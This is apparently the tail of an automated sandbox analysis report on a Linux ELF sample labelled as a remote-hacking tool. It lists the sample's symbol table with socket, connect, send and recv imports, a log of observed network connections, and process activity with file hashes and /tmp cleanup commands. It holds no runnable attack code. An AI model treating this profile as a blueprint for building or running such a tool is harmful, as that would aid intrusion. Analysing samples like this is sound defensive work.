| __gmon_start__ | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
| __init_array_end | .symtab | 0x604e08 | 0 | NOTYPE | <unknown> | DEFAULT | 19 | ||
| __init_array_start | .symtab | 0x604e00 | 0 | NOTYPE | <unknown> | DEFAULT | 19 | ||
| __libc_csu_fini | .symtab | 0x4034a0 | 2 | FUNC | <unknown> | DEFAULT | 14 | ||
| __libc_csu_init | .symtab | 0x403430 | 101 | FUNC | <unknown> | DEFAULT | 14 | ||
| __libc_start_main@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| _edata | .symtab | 0x6050d0 | 0 | NOTYPE | <unknown> | DEFAULT | 25 | ||
| _end | .symtab | 0x6050e8 | 0 | NOTYPE | <unknown> | DEFAULT | 26 | ||
| _fini | .symtab | 0x4034a4 | 0 | FUNC | <unknown> | DEFAULT | 15 | ||
| _init | .symtab | 0x4008a8 | 0 | FUNC | <unknown> | DEFAULT | 12 | ||
| _start | .symtab | 0x400a30 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
| atoi@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| close@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| completed.6362 | .symtab | 0x6050d0 | 1 | OBJECT | <unknown> | DEFAULT | 26 | ||
| connect@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| crtstuff.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| crtstuff.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| data_start | .symtab | 0x6050c0 | 0 | NOTYPE | <unknown> | DEFAULT | 25 | ||
| deregister_tm_clones | .symtab | 0x400a60 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
| elf-init.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| enumprinters.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| exit@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| frame_dummy | .symtab | 0x400af0 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
| free@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| frontend.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| functions.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| gethostbyname@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| hextoint | .symtab | 0x402411 | 619 | FUNC | <unknown> | DEFAULT | 14 | ||
| htons@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| inet_addr@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| init.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
| main | .symtab | 0x400b20 | 159 | FUNC | <unknown> | DEFAULT | 14 | ||
| memcpy@@GLIBC_2.14 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| memset@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| my | .symtab | 0x6050e0 | 8 | OBJECT | <unknown> | DEFAULT | 26 | ||
| puts@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| recv@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| register_tm_clones | .symtab | 0x400a90 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
| send@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| shutdown@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| sm | .symtab | 0x6050d8 | 4 | OBJECT | <unknown> | DEFAULT | 26 | ||
| socket@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| strcpy@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| strdup@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| strlen@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
| usage | .symtab | 0x400bbf | 34 | FUNC | <unknown> | DEFAULT | 14 | ||
| usleep@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| May 28, 2024 06:39:51.834810019 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
| May 28, 2024 06:39:52.498630047 CEST | 443 | 33606 | 54.171.230.55 | 192.168.2.23 |
| May 28, 2024 06:39:52.498972893 CEST | 33606 | 443 | 192.168.2.23 | 54.171.230.55 |
| May 28, 2024 06:39:52.503923893 CEST | 443 | 33606 | 54.171.230.55 | 192.168.2.23 |
| May 28, 2024 06:39:55.162437916 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
| May 28, 2024 06:39:57.466089964 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
| May 28, 2024 06:40:12.823954105 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
| May 28, 2024 06:40:23.062818050 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
| May 28, 2024 06:40:25.110253096 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
| May 28, 2024 06:40:53.778462887 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
| May 28, 2024 06:41:14.255650997 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
System Behavior
| Start time (UTC): | 04:39:50 |
| Start date (UTC): | 28/05/2024 |
| Path: | /tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
| Arguments: | /tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
| File size: | 31124 bytes |
| MD5 hash: | 9c4a6db5821b4a390b09223e5047cce7 |
| Start time (UTC): | 04:39:51 |
| Start date (UTC): | 28/05/2024 |
| Path: | /usr/bin/dash |
| Arguments: | - |
| File size: | 129816 bytes |
| MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
| Start time (UTC): | 04:39:51 |
| Start date (UTC): | 28/05/2024 |
| Path: | /usr/bin/rm |
| Arguments: | rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M |
| File size: | 72056 bytes |
| MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
| Start time (UTC): | 04:39:51 |
| Start date (UTC): | 28/05/2024 |
| Path: | /usr/bin/dash |
| Arguments: | - |
| File size: | 129816 bytes |
| MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
| Start time (UTC): | 04:39:51 |
| Start date (UTC): | 28/05/2024 |
| Path: | /usr/bin/rm |
| Arguments: | rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M |
| File size: | 72056 bytes |
| MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |